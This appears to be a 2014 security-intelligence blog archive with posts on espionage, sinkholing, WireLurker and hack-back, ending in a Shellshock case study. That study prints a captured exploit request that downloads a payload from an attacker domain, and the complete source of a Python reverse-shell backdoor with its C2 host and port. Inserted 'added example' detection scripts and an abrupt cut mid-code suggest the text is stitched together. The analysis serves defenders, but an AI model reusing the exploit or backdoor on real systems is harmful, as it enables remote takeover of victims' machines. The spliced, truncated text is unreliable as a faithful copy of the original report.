Monday, November 17, 2014

Why Manufacturing?

I spent a day over the weekend with a good friend. I told him that we'd done an incident response for a small manufacturing company. He asked what they did, and I told him that they work with aluminum, and they manufacture all kinds of things, including heat sinks for various components.

Why do you ask? I asked him.

And then he explained it from a perspective I hadn't considered. My (simple) assumption was that the intellectual property was the target, but this guy, a technologist presiding over a large manufacturing company, assured me that my assumption was flawed. Here it is...

So this company manufactures heat sinks. My assumption was that attackers wanted the heat sinks. NOOOO!

Think complex. Heat sinks are manufactured to run coolant through channels cut into the metal. The channels may be really small, but at electrically significant spacing. This precision is incredibly hard to achieve. Attackers don't want the fish, they want to learn how to fish! They want to learn how to do this type of precision machining so they can pump the parts out themselves.

The same holds true with optics --lasers, scopes, and any kind of high precision optic grinding. They want the process.

I feel like I've been whacked in the head to make the lightbulb come on!

Friday, November 14, 2014

Introducing Rod Castillo, Managing Director for OEM and Integration

It's been a heck of a week, and I'm happy as a hatter knowing we brought on a new Managing Director in the Lab this week.

Rod Castillo is handling our OEM Integration projects for Threat Recon.  We've had an enormous amount of interest in companies hitting the Threat Recon API, and with nearly a dozen integrations in the works, it seemed like the right time to bring someone in to assist.

Rod comes at this from an application security background. We worked together years ago at PwC... my stint was much shorter than his. Since then, he's been the CISO for Wyndham Hotels and a consultant for Level 9, and now takes on a new role with us as Managing Director for OEM Integration, Wapack Labs.

We're bringing him up to speed, but he's a heck of a nice guy, smart as hell, and ready to jump in and assist in getting Threat Recon integrated into your environment. Check him out on LinkedIn. Rod can be reached at rcastillo@wapacklab.com.


Thursday, November 13, 2014

What's old is new again! Pay no attention to the Russian spyplanes!

I never did receive my Cold War medal, but heck, these days it's pretty much an afterthought for me anyway. I've got to laugh, however. I'm preparing to do a talk next week in Pittsburgh. It's going to focus on the Ivanov doctrine and show up-to-date timing on how Putin does "new generation" warfare... and phase two of this plan calls for a deception plan --a ruse-- to take the focus off of his real objective. Today, that objective is regaining control over pipelines in Eastern Ukraine.

They've been buzzing Sweden and lost a sub on a fiber node off the coast of Stockholm, and today it was announced that we'll start seeing Bears flying off the east coast.

NATO has upset Putin with their anti-Russian sentiment? Imagine that.


Tuesday, November 11, 2014

What is Movember?

I've been asked several times in the last week or so "Why are you growing that ugly beard?"

I've been asked if I was homeless, so I finally got a good haircut (manscaping?) to make sure that even with the spotty facial hair that comes from what my grandmother used to tell us was the American Indian side, I still look gooooooooooooddddddd.

So on that... what is Movember, and why is Stutzman going with the homeless look? Because it sparks conversation around men's health. And if you want to contribute money and be involved, check out the official Movember website. It's the real deal. And when you've got family members (like I do) who currently have prostate cancer, and you think about it every day because the guy is eight months older than me, and you wonder what it must be like to be 52 years old and going through this, the idea of growing facial hair (mine really is bad) for a month to generate conversation is a small price to pay, and maybe, just maybe, it'll help someone.

So when you see me in MD/DC this week, or in Pittsburgh next --I'll be on the podium at the NIST conference at Pitt-- and chuckle at my feeble attempt to show support, know this... it's for a really good reason... stop me and ask me about it.

Thursday, November 06, 2014

Automating Victim Notifications - 1800 unique victims notified today

Wapack Labs has been running sinkholes since early April of this year. Up until recently we had been performing manual victim notifications; however, recent activity forced us to automate. Two recently sinkholed domains started generating a large quantity of traffic. One was from an old worm that has been around since 2010 but is apparently still propagating.

http://www.microsoft.com/security/portal/threat/encyclopedia/entry.aspx?Name=Worm:Win32/Esfury

The second is from a malware variant detected as Troj/Neurevt-K

http://www.sophos.com/en-us/threat-center/threat-analyses/viruses-and-spyware/Troj~Neurevt-K/detailed-analysis.aspx

In less than a week of monitoring, a total of 19561 victims checked into our sinkhole. Among the total victims, there were approximately 1800 unique networks and/or ISPs. As part of the notifications, we are providing the victim data, destination domains and timestamps of activity. If you received one of these notifications and need more clarification, shoot us a note at notifications[at]wapacklabs.com.
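What the automation amounts to, as an added example (not the lab's own notification code): take the raw check-in log, attribute each victim IP to a network owner by longest-prefix match, and emit one notification per network with the victim IPs, the sinkholed domains they contacted, and first/last-seen timestamps. The log lines, prefixes and abuse contacts below are constructed for the illustration; a real run would use ASN/whois data and the sinkhole's own logs.

```python
# Added example, not Wapack Labs code: roll sinkhole check-ins up into one
# notification per network owner. Log format, prefixes and contact
# addresses below are constructed for illustration.
import ipaddress
from datetime import datetime

# Constructed sinkhole log: "<UTC timestamp> <source IP> <sinkholed domain>"
SINKHOLE_LOG = """\
2014-11-05T13:02:11Z 203.0.113.17 c2.sinkholed.example
2014-11-05T13:02:15Z 203.0.113.17 c2.sinkholed.example
2014-11-05T13:04:40Z 203.0.113.200 worm.sinkholed.example
2014-11-05T13:09:02Z 198.51.100.9 c2.sinkholed.example
2014-11-05T14:11:51Z 192.0.2.77 worm.sinkholed.example
2014-11-05T14:12:03Z 192.0.2.78 worm.sinkholed.example
"""

# Constructed owner table (in practice derived from ASN/whois data).
# The longest matching prefix decides who gets the notification.
NETWORK_CONTACTS = {
    "203.0.113.0/24": "abuse@isp-a.example",
    "203.0.113.192/26": "abuse@hosting-a.example",
    "198.51.100.0/24": "abuse@isp-b.example",
}


def parse_log(text):
    """Return (timestamp, ip, domain) tuples, one per check-in line."""
    rows = []
    for line in text.splitlines():
        if not line.strip():
            continue
        ts, ip, domain = line.split()
        rows.append((datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"),
                     ipaddress.ip_address(ip), domain))
    return rows


def owner_of(ip, contacts):
    """Longest-prefix match; unknown owners are bucketed by /24 for manual lookup."""
    best = None
    for prefix, contact in contacts.items():
        net = ipaddress.ip_network(prefix)
        if ip in net and (best is None or net.prefixlen > best[0].prefixlen):
            best = (net, contact)
    if best:
        return str(best[0]), best[1]
    return str(ipaddress.ip_network(f"{ip}/24", strict=False)), None


def build_notifications(rows, contacts):
    """One record per network: contact, victims, domains, first/last seen, hit count."""
    groups = {}
    for ts, ip, domain in rows:
        net, contact = owner_of(ip, contacts)
        g = groups.setdefault(net, {"contact": contact, "victims": set(),
                                    "domains": set(), "first_seen": ts,
                                    "last_seen": ts, "hits": 0})
        g["victims"].add(str(ip))
        g["domains"].add(domain)
        g["hits"] += 1
        g["first_seen"] = min(g["first_seen"], ts)
        g["last_seen"] = max(g["last_seen"], ts)
    return groups


def summary(rows, notifications):
    """The numbers the post quotes: total check-ins, unique victims, unique networks."""
    return {"checkins": len(rows),
            "unique_victims": len({str(ip) for _, ip, _ in rows}),
            "networks": len(notifications)}


def render(net, g):
    """Plain-text body for one notification e-mail."""
    contact = g["contact"] or "unknown, look up manually"
    return "\n".join([
        f"Network: {net}  (contact: {contact})",
        f"Check-ins: {g['hits']}  First seen: {g['first_seen']:%Y-%m-%d %H:%MZ}"
        f"  Last seen: {g['last_seen']:%Y-%m-%d %H:%MZ}",
        "Victim IPs: " + ", ".join(sorted(g["victims"])),
        "Sinkholed domains contacted: " + ", ".join(sorted(g["domains"])),
    ])


if __name__ == "__main__":
    rows = parse_log(SINKHOLE_LOG)
    notes = build_notifications(rows, NETWORK_CONTACTS)
    print(summary(rows, notes))
    for net, g in sorted(notes.items()):
        print(render(net, g), end="\n\n")
```

The /26 entry is there to show why longest-prefix matters: a hosting customer inside an ISP's /24 should get its own notice rather than the ISP's, and victims with no known owner are still grouped by /24 so an analyst can look them up by hand instead of losing them.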

Jeff

The sh*t heading toward the fan? North Korea and nuke weps?

It should come as no surprise that North Korea is building nuclear weapons, and it should come as no surprise that they'd probably like to use them on American targets and local neighbors (although the fallout would probably head north with the wind... I'm not sure they're ready for mass radiation poisoning)... so I'll assume they're being made for American targets.

I'm curious... were the PLCs made by Siemens?



Wirelurker?

For all of you Mac users (like me) and iOS users (not like me, but there are a ton of you), WireLurker is the new interesting item in the threat category. Palo Alto published a great tech piece on the new malware, but didn't do a great job of telling what it does and why it's bad, so here you go...

It's bad. It's another class of malware that opens your system up for access by outsiders. For the non-geeks reading this, know this... you need to check for it, and if you've got it, get rid of it.

The Palo Alto report can be found here.

They've also published a script that can be used to check your system. It's easy to use: copy and paste the commands into Terminal and hit enter. I've copied Palo Alto's instructions from their GitHub below.

Usage
  1. Open the Terminal application in your OS X system.
  2. Execute this command to download the script:
  3. Run the script in the Terminal:
     python WireLurkerDetectorOSX.py
  4. Read the output messages and detection result.
For any issue with the code or its result, please create an issue here: https://github.com/PaloAltoNetworks-BD/WireLurkerDetector/issues

Wednesday, November 05, 2014

This is AWESOME!! AirHopper - Hacking via FM Radio signals!

THIS IS AWESOME! Do you have any idea how many times I've fired up my shortwave radio and listened to some far away place (from a really secure place --of course it was an approved device-- I'm just sayin'!) just for some entertaining white noise while I focused on something else? And no, I don't trust internet radio to not place something on my machine --intentionally or unintentionally!

I'm a huge fan, and a long time amateur radio operator. This really takes me back. I remember (ahem, hypothetically of course) clipping the band pass filters on my 2 and 6 meter rigs to listen in on other frequency ranges (I won't say which ranges), and screwing with a Sun SPARC 20 generating packet radio in early experiments between routers and repeaters (some even worked!), but the idea of hacking a computer via frequency modulation (FM radio signals) is AWESOME! In my mind's eye I can see some ways this would be logical, but I never thought I'd see the day. Pay attention folks! The game changes yet again, and neither air gapping nor disabling internet connections is going to help! Ah yes, radio frequency. Gotta love it!

Where do they come up with this stuff??

You've got to check out the video! (of course, at your own risk!)


Monday, November 03, 2014

SCHWEEEEETTT

You've heard me say it before. I'm a believer that if someone breaks into my home in the middle of the night and threatens me or my family, I should have the right to defend myself, my family, and my property. And I'm a believer that my Second Amendment rights should extend to cyber space as well. If someone breaks into my computer in the middle of the night, not only should I have the ability to defend myself, but also to fight back. There will be consequences for sure, and when hitting someone bigger, faster, or smarter, I may just get my clock cleaned. And if I shoot and hit the wrong guy, well, again, consequences...

So why the heck are we sitting back taking it? Well, at least one country believes enough is enough. The Netherlands says that they will start hacking back in 2015. Good, bad, right, wrong, or indifferent as you might think, my feeling is this opens up a whole new can of worms. I think it's a game changer.


Saturday, November 01, 2014

Thinking differently...

This is awesome (not really!) but it goes directly to something I heard just the other day.

When most computer guys think intelligence, they think packets, bytes, bits, etc.

When I think intelligence, I think... how do I think like the other guy? What's he going to do? How would he operate against someone? What motivates him/her?

So someone mentioned to me that when doing business in Russia, the company had to assign someone (full time) to watch for changes in laws (mostly tax laws) that happen overnight and that, if not caught, would cause harsh and immediate fines (yet another revenue opportunity). And I thought to myself, that's pretty extreme! Would we really need to hire someone full time??

And today, this piece from the NY Times. Yes, others in the world do think differently. And where Putin's friends stand to profit, laws (apparently) can change on a dime.

Have a read!

Friday, October 31, 2014

Hiring an MSSP?

I've been reading Anton's running commentary on hiring and using an MSSP, and I had to comment.

Wapack Labs does backend work for incident response teams who don't have the ability to do it themselves. Get your blood drawn? It probably goes to a lab for workup. We do the workup.

Yesterday, we (Wapack Labs) out-briefed a report on a case where a small (100 person) company had been breached... standard stuff (although not for them!). Spyware delivered Zeus, which delivered CryptoLocker, which of course encrypted his files and held them (the CEO) hostage until he paid a $600 bitcoin ransom, and presumably more. But it's not the incident that had me scratching my head, it's that when we passed them a half dozen command and control IP addresses and domains, and told him to put them in his UTM (he's got a SonicWall) and monitor for a few minutes to see who's talking to them internally, he had no idea what I was talking about. These guys simply were not prepared... and they probably had no clue until recently that this stuff even existed.
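What "put them in the UTM and see who's talking to them" looks like when the box can't do it for you, as an added example (not Wapack Labs code, and not a SonicWall feature): run the firewall's connection and DNS logs through a short script with the C2 list and get back the internal hosts that touched it. The log format, indicators and addresses are constructed for the illustration; C2 lists often carry CIDR ranges as well as single IPs, and C2 domains are usually contacted through subdomains (the Shellshock case below uses stats.<domain>), so the script handles both.

```python
# Added example, not Wapack Labs code or a SonicWall feature: match outbound
# connection and DNS log lines against a C2 indicator list to find the
# internal hosts that are talking to it. The log format and all indicators
# below are constructed for illustration; IPv4 only.
import ipaddress
import re

# Constructed indicators of the kind handed to the customer: C2 IPs/CIDRs and domains.
IOC_IPS = {"198.51.100.45", "203.0.113.0/28"}
IOC_DOMAINS = {"update-stats.example", "cdn-metrics.example"}

# Constructed firewall/UTM log: key=value fields, one connection or DNS query per line.
FW_LOG = """\
2014-10-30T09:14:02Z action=allow src=10.0.0.12:51234 dst=198.51.100.45:443 proto=tcp
2014-10-30T09:14:03Z action=allow src=10.0.0.12:51235 dst=93.184.216.34:443 proto=tcp
2014-10-30T09:15:10Z action=dns src=10.0.0.31 query=stats.update-stats.example
2014-10-30T09:15:11Z action=allow src=10.0.0.31:40022 dst=203.0.113.9:8080 proto=tcp
2014-10-30T09:16:00Z action=dns src=10.0.0.40 query=update-stats.example.com
2014-10-30T09:17:45Z action=allow src=10.0.0.55:49201 dst=203.0.113.200:80 proto=tcp
"""

FIELD_RE = re.compile(r"(\w+)=(\S+)")


def parse_line(line):
    """key=value fields of one log line as a dict."""
    return dict(FIELD_RE.findall(line))


def ip_matches(ip, iocs):
    """Return the indicator (single IP or CIDR) that contains ip, else None."""
    addr = ipaddress.ip_address(ip)
    for ioc in iocs:
        if addr in ipaddress.ip_network(ioc, strict=False):
            return ioc
    return None


def domain_matches(name, iocs):
    """Exact or subdomain match: stats.c2.example matches c2.example,
    but c2.example.com must not."""
    name = name.lower().rstrip(".")
    for ioc in iocs:
        ioc = ioc.lower()
        if name == ioc or name.endswith("." + ioc):
            return ioc
    return None


def find_talkers(log_text, ioc_ips, ioc_domains):
    """Return {internal host: set of matched indicators} over the whole log."""
    hits = {}
    for line in log_text.splitlines():
        if not line.strip():
            continue
        f = parse_line(line)
        src = f["src"].rsplit(":", 1)[0]  # strip the source port if present
        matched = None
        if "dst" in f:
            matched = ip_matches(f["dst"].rsplit(":", 1)[0], ioc_ips)
        elif "query" in f:
            matched = domain_matches(f["query"], ioc_domains)
        if matched:
            hits.setdefault(src, set()).add(matched)
    return hits


def render(hits):
    """One line per internal host for the responder."""
    return "\n".join(f"{host}: {', '.join(sorted(iocs))}"
                     for host, iocs in sorted(hits.items()))


if __name__ == "__main__":
    print(render(find_talkers(FW_LOG, IOC_IPS, IOC_DOMAINS)))
```

Two hosts come back: the one that connected straight to a listed IP, and the one that resolved a subdomain of a listed domain and then connected into a listed range. The host that looked up update-stats.example.com is correctly left out; a plain substring match would have flagged it.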

The company has SSL VPNs, a SonicWall UTM, and that's about it as far as we can tell. The IT staff is one guy.

The CEO thought they were safe.

So here's the deal... His company, a manufacturing company, has computers, but is primarily a machine shop. So what's he to do? In his case, more IT (security) is an overhead cost in an already competitive, tight-margin business... so what's he to do? Rent or buy?

My recommendation to him? Rent. Focus on his core business of making widgets.

He's already asked for recommendations - we work with four MSSPs --who all use the intel from either Red Sky Alliance or the lab (or both) to protect their customers. We've passed on recommending others, simply because the customer feedback we receive about them has been, well, less than stellar.

Look, for a company who prefers to focus on their core, an MSSP is a wonderful thing, but it's got to fit your use model, and you've got to know what you're going to get. In the meantime, the idea of installing a suite of security tools, hiring a team, and budgeting those increasingly hard to maintain margins comes at a high price for manufacturing companies like the one we visited. MSSPs, when used correctly, are a GREAT alternative.

Saturday, October 25, 2014

Change in blog format

I've taken a bit of a different tack on blogging of late. Rather than point out hard issues (that sometimes get fixed, sometimes not), I've started posting through the week. Posts to the Henrybasset Blog are announced on Twitter, LinkedIn, and Facebook, but because of issues associated with the use of a mailer system, I'm going to temporarily hold off on announcing via email. If you'd like to receive updates from my blog, please feel free to sign on, or follow me on Twitter at @henrybasset, Google+, or LinkedIn.

I'm keeping it short this morning... daughter's testing for High School admissions (can you imagine!).

Have a great weekend. Keep an eye out through the week. I'll be posting!

jeff

Friday, October 24, 2014

Moscow, Beijing poised to sign deal on joint cyber security ops

This is interesting to me.

"A draft treaty apparently outlines mutual agreement to the use of online operations to interfere with independent states in a bid to undermine sovereignty or disrupt social, economic or political order."

The idea that Russia and China are reportedly signing an agreement on November 10th for joint use of online operations is amazing to me. For those of you who've heard me talk, I talk much about the idea of disintermediation... taking out the middle man. Who, do you think, independent states might be? I'm guessing the US, maybe Sweden (just a wild guess after Russian flyovers, and a submarine off the coast of Stockholm), maybe Poland and Ukraine? Regardless, if you think for a moment that infrastructures in China are only used by Chinese hackers today, you're wildly mistaken. The sky isn't falling, but once these guys figure out how to work together (all new partnerships go through forming, storming, norming and performing... we'll see how long it takes)... once they figure it out, the game changes.

Thursday, October 23, 2014

Poles who spied for Russia?

We've been tracking the Russia | Ukraine conflict for about a year, and last month one of our analysts speculated that we'd see cyber activity hitting Polish targets. It should come as no surprise. Poland has been looking for opportunities to reduce their dependence on Russian gas, which btw, travels through pipelines in Ukraine... seeing any patterns?

So this crossed my radar tonight when I had a few moments to settle in for the night. Intelnews has been talking about Russian spies in Poland.  Intelnews is one of my favorite sites for non-technical, geopolitically focused intelligence... and this is the third such piece I've seen in two days. And with the thought that Russia will continue to regain control, if not over Ukraine, then over the lines that pass their fuel to the EU, and also over those who attempt to find other sources, it is our belief that Poland will not only land in the crosshairs of foreign intelligence (from Russia), but also that we'll see the Putin/Ivanov cyber playbook continue, but with expanded new targeting.

So I scratch my head. With Cyber Berkut (a Ukrainian, pro-Russian hacker group) hitting the Warsaw Exchange in August, and the reporting of Russian intelligence operating in Poland... does it make sense that we see ISIS messaging in files pulled from the Warsaw Exchange today? I'm not jumping to conclusions, only looking at the pile of data with one eye closed and the other in a hard squint.

If it walks like a duck, quacks like a duck, and leaves little piles around my pond... Well, we're keeping an eye out for swimmers scooting over the water.


Warsaw Stock Exchange whacked? Cyber Berkut?

Pastebin indications of a Warsaw Stock Exchange compromise. Here's the first public reporting we've seen, after we reported it to our members and customers.

According to other reporting, several thousand passwords and files leaked. Apparently, there were also attacks attributed to Cyber Berkut in August. If you were at the FS-ISAC summit, I told you about Cyber Berkut and Green Dragon... they've also been used to attack a Ukrainian bank and governments in the EU.


Wednesday, October 22, 2014

iCloud... and of course, Apple's response

It doesn't call out attacks from China, but Apple does respond... if you didn't know how to check it (I'm assuming that if you read my blog, you probably do... I hope you do...), here are Apple's directions on how to check the digital certificate associated with the iCloud website.

http://support.apple.com/kb/HT6550?viewlocale=en_US&locale=en_US

"The iCloud website is protected with a digital certificate. If users get an invalid certificate warning in their browser while visiting www.icloud.com, they should pay attention to the warning and not proceed."

I have a couple of thoughts on this.. you knew I would.

First, the iCloud website is indeed NOT protected by a digital certificate. The digital certificate in and of itself is part of a protection scheme, but I wouldn't hang my hat on a digital certificate keeping bad guys out of iCloud.

Second, leaving this to users to check, 'pay attention to the warning and not proceed' strikes me smack in the funny bone. I want to laugh, but it hurts when I get hit there. Check that digital cert every time you log in. I wonder if my mom will check it when she logs in. Will yours?



China in iCloud? Like a freakin sticky booger!

Apple iCloud is (allegedly) full of Chinese hackers, grabbing personal photos, personal information, and presumably, my iTunes library! I'm thinking there's a simple and easy defense. Let them find my P90X starting pictures; it'll scare 'em off for good! They'll never come back!

http://thehill.com/policy/cybersecurity/221435-chinese-government-suspected-of-launching-apple-cyberattack


Regardless, these guys keep coming back. So two things... Chinese hackers as I know them aren't as much interested in personal information (that's the domain of others) as they are in intellectual property and targeting Falun Gong. The MO (to me) sounds more like someone else using a Chinese infrastructure to pull off something more. iCloud isn't exactly known for hosting business, so I'm thinking (speculating only) that it's PII that the attackers might be after (or maybe they'll find the pictures of the iPhone 7??). To the money guys (meaning carders) full identities mean more money --PINs are more easily reset.

So is it Chinese? Is it someone else using Chinese tools? Tell me more!

Jeff

Sunday, October 19, 2014

How do we achieve 100%?

I nearly always drive when I travel. I hate to fly. I drive because before or after a busy week, the time on the road lets me think, without the constant interruption of email, phone calls, etc. This is some of my most productive thinking time. I like to play audio books. Yesterday it was Moby Dick --I like the classics.

Yesterday, during my eight hour drive, one of the things that I thought about over and over, was a conversation I'd had with a security manager at one of the government agencies during the week. We talked about his small team, and the need for analysis, and as the conversation continued, he brought it back to the user. Here's what he said. It stuck with me...

Users get literally seconds to decide whether or not to click that email. They've gotten really good at recognizing run of the mill spam, and sometimes even catch the more advanced phishing, but still, our job is to give them the tools to help them during those few seconds. And if they make the wrong choice, then we need to be able to protect them. They really do try and do the right thing, but the emails can look very real. What are they to do? They rely on us.

So on the heels of yesterday's (blah) blog that I posted before hitting the road, I wanted to take a moment and address this very simple, but at the same time, very complex thought process.

This manager told me the story of an overzealous retired Air Force cyber guy who walked the halls, telling people, one at a time, that they needed help. He did threat briefs, helped users, and built a program --one office, one person at a time. Every office apparently has their own systems administration team, and none want to be 'that guy' who let their boss be embarrassed by having him or her click on spam. So they do an amazing amount of education and awareness. But again, it's not just the 90% that we must consider. And while it sounds unreachable, identification and mitigation of 100% of malicious emails must be the goal.

So how does that happen? Today, it doesn't. I've heard of email 'detonation' services that click on every link. DLP in this space is largely ineffective. Rule based systems have too little flexibility.

So I put this to you...

Thoughts? How do we achieve 100% guarantees of user protection in their email? How do we protect a diligent user when they make the wrong choice?

Thoughts?
Jeff

Saturday, October 18, 2014

Henrybasset weekly

I had the pleasure of attending the FS-ISAC conference this week, and to be the first speaker on the podium on Tuesday morning. The overarching theme was, as at many conferences this year, cyber threat intelligence. My talk offered a timeline analysis of the Russia | Ukraine conflict, and how the timeline tracked so nicely with the Ivanov Doctrine. Ivanov was the Russian Minister of Defense who, after receiving a paper from Putin in 2003, radically changed the direction of the Russian military. It appears they've taken many lessons from the US. In fact, two researchers spelled out the lessons learned from Desert Storm, Desert Fox, Yugoslavia, and Afghanistan quite nicely. And you know what? The playbook worked in Ukraine. And the story was well received at the ISAC, and again today by a new audience.

There were a couple of thoughts that I took away from the conference. First, one of the presenters made a comment that "you can't get all of the intelligence you need by yourself". The second, was the idea that there are now verticals forming in the threat intelligence space. I forgot who said it, but verticals appear to be forming. There were several, but these were the ones I remembered without going back and consulting my notes:

  • Information Sharing
  • Content (Intelligence) providers
  • Threat information management companies
Interestingly enough, every time we go out and talk about Red Sky Alliance and Wapack Labs, we seem to run into the same couple of competitors, and so the education begins. Today, the education started with a full-on, make-it-relevant threat presentation: strategic intelligence boiled down into the stuff that's going to hurt you today, ending with a list of compromised accounts. Normally we include a few other relevant tidbits, but it's been such a busy week that I didn't have time to do the appropriate pre-work before going onsite. Nonetheless, they quickly understood the difference between a company that produces intelligence (Wapack Labs) and one that delivers it through crowdsourced collaboration (Red Sky): the idea that data can be boiled out of good analysis, provided with the context that the ISAC members now know as intelligence, and delivered in such a way that it can be brought into a management system and managed.

So, when someone says "you can't get everything you need by yourself", try asking someone in Red Sky. When you need information delivered that's high confidence, human analyzed, and parsable by a management system, try a TIM. And if you don't have researchers who could benefit from a crowdsourced analysis center (Red Sky), and you want a managed security service provider that uses our data, try one of the folks that use data from the portal to protect you. There are a couple of good ones I'd recommend. Call me and I'll introduce you.

That's it for now. I'm going to keep it short. It's Friday night, and before I drive back to New England tomorrow I'm going to smoke a great cigar and have a martini.. because this was a GREAT week.

So until next time,
Have a GREAT weekend!
Jeff


Saturday, October 11, 2014

Red Sky Weekly: FAQ and ShellShock

At least three times every week I get asked by someone "What's the difference between Wapack Labs and Red Sky Alliance?" "Who is your target customer?" "What product do we deliver?" "What's your distribution look like?"

So let's start here...

Wapack Labs is an intelligence, research and analysis company. We sell information.

  • Wapack Labs authors, sources and sells intelligence, research and analysis. We deliver it in many forms, to many places... Red Sky Alliance/Beadwindow, the FS-ISAC, subscriptions, OEM, Threat Recon, etc. We publish in PDF, STIX, HTML, CSV, and JSON.
Red Sky Alliance is a crowdsourcing platform for cyber threat intelligence pros. Discussions are deep, and at the end of the thread, members receive a finished report with analysis of the discussion.

  • Security researchers go to Red Sky Alliance to share notes, build the story, and together, protect their networks. What happens in Red Sky Alliance, stays in Red Sky Alliance. It's private. There's no government involvement. We don't care how you interact with DSS, the regulators, or any other government organization --that's your choice. Red Sky Alliance exists to help improve your security. The private portal is ALWAYS busy. We've added university users, and just this week, another Icelandic bank.
  • For government security researchers we offer a second collaborative... Beadwindow --delivered in Threat Connect. They do not get access to the Red Sky private portal, but they do get information that they may care about. We've delivered cyber warnings, dumped credential caches and targeting, to several government agencies directly, and for others, we push stuff through Beadwindow to contacts at the 24th AF and the US MDA. None of the US Cyber Centers participate, so if you're a state, local or .gov who needs help, call us. We can help. And our stuff is UNCLASSIFIED! You can actually use it!
As an example of one of our reports, I've posted (below) a snippet from a Wapack Labs report to Red Sky Alliance members and Wapack Labs subscribers...

We published this report in its entirety last week.

We took a bit of a different approach on what seemed to be the hottest topic of the last two weeks - Shellshock. (Need information on Shellshock? Try here.)

We looked for use cases where we might help protect against it. This is one of three case studies we'd identified that took advantage of Shellshock.

You'll see quickly that it's written for technically focused defenders. If you're a SOC analyst, incident responder, or intrusion analyst, this is for you. We have others for managers and the C-suite, but this report is lower level. We show all of our work and sources. When done, it gets published as a PDF in whole, and (if sourced by Wapack Labs) farmed for Threat Recon.

So if you're a techie, enjoy. If you're a manager, ask your techie what it means ;) 

SHELLSHOCK CASE STUDY AND INFRASTRUCTURE

Beginning on 24 September 2014, hackers and researchers began exploiting the widely publicized Shellshock bash vulnerability, described in CVE-2014-6271. The majority of the initial activity involved mass vulnerability scanning by white hats and black hats alike. Examination of scanning activity showed a peak on September 27th with a sharp decline as of September 29th. This spike and sudden decrease may be a result of what is likely wide-scale patching of the vulnerability. Alternatively, it may mark the end of exploiting the vulnerability for reconnaissance purposes and could signal a move up the kill chain into more targeted operations.

Legacy Scamming infrastructure re-emerges with Shellshock

A recently observed instance of Shellshock in the wild took the form of a Python-implemented backdoor hosted on google-traffic-analytics.com. Table 5 lists the observed originating IPs along with the Shellshock request:

Table 5. google-traffic-analytics.com Scanning Nodes

Originating IPs:
  14.163.12.119
  77.29.189.34
  78.15.20.81
  78.161.195.166
  79.136.130.110
  88.253.229.151
  93.139.212.67
  109.227.100.189
  112.156.18.40
  113.171.116.163
  117.218.186.16
  118.172.123.111
  119.130.114.154
  124.123.75.68
  178.120.175.81
  178.121.79.68
  190.49.241.220
  190.82.114.190
  223.206.54.26

Shellshock Request (as captured; truncated):
  () { :;}; /bin/bash -c '/usr/bin/env curl -s http://google-traffic-analytics.com/cl.py > /tmp/clamd_update; chmod +x /tm

Downloaded backdoor (cl.py):
#!/usr/bin/env python
# cl.py as recovered from google-traffic-analytics.com (Python 2 syntax as
# captured): a minimal reverse shell. The process forks; the parent keeps
# the C2 connection, the child falls through the "if" and exits at once.
from socket import *
import os
from time import sleep
import sys


fpid = os.fork()

if fpid!=0:

    host='stats.google-traffic-analytics.com'   # C2 host
    port=9091                                   # C2 port (TCP)
    sockobj = None
    ############################################

    sockobj = None
    recv = False

    def connect():
        # Returns a connected socket, or False if the C2 is not listening
        try:
            sockobj=socket(AF_INET,SOCK_STREAM)
            sockobj.connect((host,port))
            return sockobj
        except:
            return False


    while True:
        # Retry once a second until the C2 accepts the connection
        while not sockobj:
            sockobj = connect()
            print "[*] Trying to reconnect..."
            sleep(1)
            if sockobj:
                print "[+] Connected"

        # Each message from the C2 is treated as one shell command line
        recv = sockobj.recv(1024)
        #print recv
        # An empty read means the C2 closed the connection; "break" leaves
        # the outer loop, so the backdoor exits instead of reconnecting
        if not recv: sockobj = False; break;
        cmd = recv.strip()
        # Run the command through the system shell, send its output back
        res = os.popen(cmd).read()
        if res:
            sockobj.sendall(res)

Open source research on google-traffic-analytics.com returned only one previous hit, from 2010. In August of 2010, Sucuri reported a wave of spam that affected more than 200K websites, including many popular sites [3]. Investigation of the activity revealed that they were all controlled by www.google-traffic-analytics.com. The blog reported that google-traffic-analytics.com leveraged the compromised sites as part of a widespread spamming infrastructure.

Table 6. Whois Record Comparison

Legacy Whois Record (2010):
  Registrant Contact:
    Goga Gastoyan
    Goga Gastoyan Goga Gastoyan bash@blogbuddy.ru
    +7.4957452002 fax: +7.4957452002
    Pokryshkina d.36 kv.36
    Moscow Moscow 119602
    ru

Current Record (since 2013):
  Admin Name: Radovanka Janekovic
  Admin Organization: Goga Gastoyan
  Admin Street: Ljubljanska 6
  Admin City: Bled
  Admin State/Province: Bled
  Admin Postal Code: 4260
  Admin Country: SI
  Admin Phone: +386.15765749
  Admin Phone Ext:
  Admin Fax: +386.15765749
  Admin Fax Ext:
  Admin Email: support@google-traffic-analytics.com

Upon successful exploitation, a curl request is made for http://google-traffic-analytics.com/cl.py. The Python script (cl.py) is a simple yet effective backdoor that works on both Linux and Windows, and at the time of analysis it had zero detections on VirusTotal [1]. The configured C2 address is on the subdomain stats.google-traffic-analytics.com. The downloaded Python script attempts to connect to the C2 on TCP port 9091 and, if the C2 is listening, gives the C2 a command shell on the victim.

During testing, the C2 node issued a uname -a command, which prints kernel and system information about a Linux host [2]. No additional activity was observed. (See the Mitigations section for a Snort signature.)


The re-emergence of this domain after an apparent four-year hiatus raises the question of whether it belongs to the same attackers. A Whois history report from DomainTools lists the registrant during 2010 as "Goga Gastoyan" (bash@blogbuddy.ru); this changed in 2013 to the current owner, "Radovanka Janekovic". Further inspection of the records revealed Goga Gastoyan as the Admin Organization in the new record, supporting attribution of both records to the same attackers. With the connection made to the legacy infrastructure, this latest activity involving Shellshock may be the most recent attempt to expand the spamming network.

[1] https://www.virustotal.com/en/file/052421011162421c7fbe1c9613e37b520a494034901dab1c6ee192466090421d/analysis/
[2] http://linux.about.com/library/cmd/blcmdl1_uname.htm
[3] http://blog.sucuri.net/2010/08/more-spam-google-traffic-analytics-com-cc-server.html
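The Mitigations section and its Snort signature aren't part of this excerpt, so here is an added example (not from the Wapack Labs report) of the same check done over HTTP request logs in Python: flag any header carrying the bash function-definition prefix that triggers CVE-2014-6271, URL-decode first so encoded variants don't slip past, and pull out the URL the payload fetches so it can go straight into a blocklist or a sinkhole. The request records are constructed; the first reuses the request string from Table 5, truncated as it appears there.

```python
# Added example, not from the Wapack Labs report: flag the Shellshock
# exploitation pattern in HTTP request headers and pull out the URL the
# payload fetches. The request records below are constructed (the first
# reuses the truncated request string from Table 5).
import re
from urllib.parse import unquote

# Bash function-definition prefix that triggers CVE-2014-6271: "() {" with
# optional whitespace. Kept loose on purpose: attackers varied the body.
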